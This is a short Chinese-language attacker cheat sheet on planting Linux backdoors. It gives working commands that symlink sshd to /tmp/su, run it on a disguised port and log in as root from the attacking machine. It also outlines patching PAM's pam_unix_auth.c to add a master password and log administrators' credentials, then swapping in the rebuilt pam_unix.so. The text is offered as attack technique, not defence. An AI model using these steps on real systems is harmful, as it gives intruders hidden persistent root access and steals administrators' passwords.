SSH 后门
软链接sshd
目标主机建立软连接:
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=1189
#端口可以任意指定,最好伪装一下
查看端口:
netstat -anlp|grep 1189
攻击机ssh登录:
ssh root@x.x.x.x -p 1189
#如果root用户被禁止登陆时,可以利用其他存在的用户身份登陆
具体原理:https://www.cnblogs.com/likaiming/p/11007919.html
Linux PAM密码记录后门
PAM(Pluggable Authentication Modules),是由Sun提出的一种认证机制。它通过一共一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。
这种后门主要是通过pam_unix_auth.c打补丁的方式潜入到正常的pam模块中,以此来记录管理员的账号密码。其大致流程如下:
1.获取目标系统所使用的PAM版本,下载对应版本的pam版本
2.解压缩,修改pam_unix_auth.c文件,添加万能密码
3.编译安装PAM
4.编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即可使用万能密码登陆,并将用户名密码记录到文件中。
参考:
Linux-PAM后门
其他方法请参考: